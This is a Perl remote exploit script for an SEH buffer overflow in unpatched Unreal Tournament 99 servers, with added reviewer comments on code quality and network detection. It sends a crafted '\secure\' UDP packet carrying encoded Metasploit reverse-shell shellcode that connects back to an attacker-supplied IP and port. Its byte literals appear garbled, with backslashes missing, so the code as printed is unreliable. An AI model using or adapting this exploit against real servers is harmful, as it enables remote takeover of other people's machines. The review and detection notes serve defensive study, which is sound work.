# Title : Unreal Tournament Remote Buffer Overflow Exploit (SEH)
# Published : 2011-02-09
# Author : Fulcrum
# Unreal Tournament Remote Buffer Overflow Exploit (SEH) (Windows)
# Discovered by: Luigi Auriemma (http://aluigi.altervista.org/adv/unsecure-adv.txt)
# Coded By: Fulcrum (08/02/2011)
#
# Patch: http://www.unrealadmin.org/forums/showthread.php?t=15616
# Vulnerable: all ut99 servers without a patch.
# Tested on: win7 64-bit, xp sp3, vista sp2 with ut v400,436,440,451,451b
#
# Bad characters: 0x00 0x5c
# Maximum shellcode size: 938 bytes
#
# Thanks to: Metasploit, Heretic, Luigi Auriemma, Peter Van Eeckhoutte & Skylined
use IO::Socket::INET;
# Header
# NOTE(review): the script has no `use strict; use warnings;`, so $socket,
# $recvmsg, $packet and the *_hex scalars below are all implicit package globals.
# NOTE(review): several literals read as "x41", "\basic\", "<reverse port>n" and
# split(/./ ...), which is consistent with backslashes having been dropped when
# this listing was captured; the byte values should be read as indicative, not
# verbatim, and the listing is unlikely to parse exactly as printed.
# Argument check: only the presence (truthiness) of the 4th argument is tested;
# host, query port and reverse ip are never validated.
die "Usage: unreal_tournament-bof-win.pl <host> <query port> <reverse ip> <reverse port>n" unless ($ARGV[3]);
# Connect to the server
# UDP socket with a default peer, so the later send()/recv() calls need no
# address. `or die` carries no message and does not include $!, so a failed
# socket setup gives no diagnostic. `new IO::Socket::INET(...)` is indirect
# object syntax; IO::Socket::INET->new(...) is the conventional form.
$socket = new IO::Socket::INET(PeerAddr => $ARGV[0],PeerPort => $ARGV[1], Proto => "udp", Timeout => 2) or die;
# Convert the reverse ip and port to hex format
# Each octet is packed as a single signed char ("c*") and the whole thing is
# rendered as one hex string, consumed two hex digits at a time further down.
# NOTE(review): as printed the split pattern is /./, which matches any
# character and therefore yields no fields -- confirm against the original.
$reverse_ip_hex = join("", unpack("H*", pack("c*", split(/./, $ARGV[2]))));
# Port packed as a 32-bit big-endian value ("N"); only hex offsets 4..7, i.e.
# the two low-order bytes in network order, are used when building the payload.
$reverse_port_hex = unpack("H*", pack("N", $ARGV[3]));
# Get the server version
# First datagram is the ordinary "\basic\" status query. The reply (at most 512
# bytes, one recv, no retry) is used solely to choose the padding length and
# the handler address below; an empty or late reply falls into the else branches.
# Detection note: the whole exchange is unauthenticated UDP on the query port --
# a "\basic\" query followed immediately by a "\secure\" datagram carrying
# several hundred bytes of payload, far more than a normal query packet.
$socket->send("\basic\");
$socket->recv($recvmsg, 512, 0);
# Create the special packet
$packet = "\secure\"; # header
# Padding length is selected from the gamever string in the \basic\ reply
# (24 bytes for builds 400/436, 64 otherwise); the choice is build-specific,
# see the "Tested on" line in the file header.
if ($recvmsg =~ /gamever\(400|436)/) {
$packet .= "x41" x 24; # junk for ut v400,436
} else {
$packet .= "x41" x 64; # junk for ut v440,451,451b
}
$packet .= "xebx06x90x90"; # nseh / short jump to the shellcode
# Handler address also chosen per build; both values are addresses inside
# core.dll of the respective server version, so the result is not portable.
if ($recvmsg =~ /gamever\440/) {
$packet .= "x61xaex14x10"; # seh / 0x1014AE61 / pop ebx - pop - ret / core.dll v440
} else {
$packet .= "x98x53x13x10"; # seh / 0x10135398 / pop esi - pop - retbis / core.dll v400,436,451,451b
}
$packet .= "x90"; # nop
# Decoder stub is appended unencoded; it is the counterpart of
# shellcode_encoder() below and turns the alphanumeric blob back into bytes.
$packet .=
"xebx03x59xebx05xe8xf8xffxffxff".
"IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"; # alphanumeric decoder from Skylined (getEIP code taken from Heretic)
# Stage payload: the msfpayload-generated reverse shell named in the trailing
# comment, with the ip and port bytes spliced in at the chr(hex(...)) lines,
# then passed through shellcode_encoder() -- presumably so that the bytes on
# the wire avoid the bad characters listed in the file header (0x00, 0x5c).
$packet .= shellcode_encoder(
"xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52".
"x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26".
"x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0d".
"x01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0".
"x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b".
"x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xff".
"x31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7d".
"xf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8b".
"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44".
"x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8b".
"x12xebx86x5dx68x33x32x00x00x68x77x73x32x5f".
"x54x68x4cx77x26x07xffxd5xb8x90x01x00x00x29".
"xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50".
"x40x50x40x50x68xeax0fxdfxe0xffxd5x89xc7x68".
chr(hex(substr($reverse_ip_hex, 0, 2))). # 1st byte of the ip in hex
chr(hex(substr($reverse_ip_hex, 2, 2))). # 2nd byte of the ip in hex
chr(hex(substr($reverse_ip_hex, 4, 2))). # 3rd byte of the ip in hex
chr(hex(substr($reverse_ip_hex, 6, 2))). # 4th byte of the ip in hex
"x68x02x00".
chr(hex(substr($reverse_port_hex, 4, 2))). # 1st byte of the port in hex (high byte, network order)
chr(hex(substr($reverse_port_hex, 6, 2))). # 2nd byte of the port in hex (low byte, network order)
"x89xe6x6ax10x56".
"x57x68x99xa5x74x61xffxd5x68x63x6dx64x00x89".
"xe3x57x57x57x31xf6x6ax12x59x56xe2xfdx66xc7".
"x44x24x3cx01x01x8dx44x24x10xc6x00x44x54x50".
"x56x56x56x46x56x4ex56x56x53x56x68x79xccx3f".
"x86xffxd5x89xe0x4ex56x46xffx30x68x08x87x1d".
"x60xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxff".
"xd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72".
"x6fx6ax00x53xffxd5"); # reverse tcp shellcode / ruby msfpayload windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 P
# Send the special packet
# Return value of send() is ignored; being UDP there is no delivery signal anyway.
$socket->send($packet);
# Close the connection to the server
$socket->close();
# exit comes before the sub definition; named subs are compiled before run
# time, so the shellcode_encoder() call above still resolves.
exit;
# Alphanumeric encoder function from Skylined (Alpha2)
sub shellcode_encoder {
# Encodes a byte string into two output bytes per input byte, each output byte
# being a member of $valid_chars, so the result is purely alphanumeric.
# For an input byte with high nibble A and low nibble B the pair (first, second)
# satisfies: high(second) XOR low(first) == A and low(second) == B; the decoder
# stub prepended by the caller reverses exactly that.
# Arg: $_[0] -- the raw bytes to encode. Returns: the encoded string followed
# by a trailing "x41" marker (as printed; see the review note on escapes above).
# NOTE(review): `local LIST` without parentheses localizes only $valid_chars;
# the remaining scalars are just package globals evaluated in void context,
# and $char is never declared at all. $a/$b are also Perl's sort comparator
# globals. Without `use strict` none of this is reported.
# NOTE(review): the choice of chars is driven by rand() and there is no srand()
# in this listing, so the same input encodes differently on every run.
local $valid_chars, $shellcoded_encoded, $a, $b, $c, $d, $e, $f, $i, $j;
# Charset deliberately omits 'A' (0x41); every low-nibble value 0..f occurs at
# least once (digits, B..O, P, a..o), which is what keeps the two search loops
# below from spinning forever -- shrink the charset and they can.
$valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
$shellcoded_encoded = "";
for($i=0; $i<length($_[0]); $i++) {
# Current input byte as an integer (round-trips through a hex string; ord()
# would do the same in one step).
$char = hex(unpack("H*", substr($_[0], $i, 1)));
$a = ($char & 0xf0) >> 4; # high nibble of the input byte
$b = ($char & 0x0f); # low nibble of the input byte
$f = $b; # low nibble of the second output char is the input's low nibble
# Start at a random charset position and walk (wrapping) until a member whose
# low nibble equals $f is found; its high nibble becomes $e.
$j = int(rand(length($valid_chars)));
while((hex(unpack("H*", substr($valid_chars, $j, 1))) & 0x0f) != $f) { $j = ++$j % length($valid_chars); }
$e = hex(unpack("H*", substr($valid_chars, $j, 1))) >> 4;
$d = ($a^$e); # low nibble of the first output char, chosen so that $e ^ $d == $a
# Same search again for a member whose low nibble equals $d; its high nibble is $c.
$j = int(rand(length($valid_chars)));
while((hex(unpack("H*", substr($valid_chars, $j, 1))) & 0x0f) != $d) { $j = ++$j % length($valid_chars); }
$c = hex(unpack("H*", substr($valid_chars, $j, 1))) >> 4;
# Both emitted bytes are exactly the charset members found above.
$shellcoded_encoded .= chr(($c<<4)+$d);
$shellcoded_encoded .= chr(($e<<4)+$f);
}
# Terminator appended after the encoded data.
$shellcoded_encoded .= "x41";
return $shellcoded_encoded;
}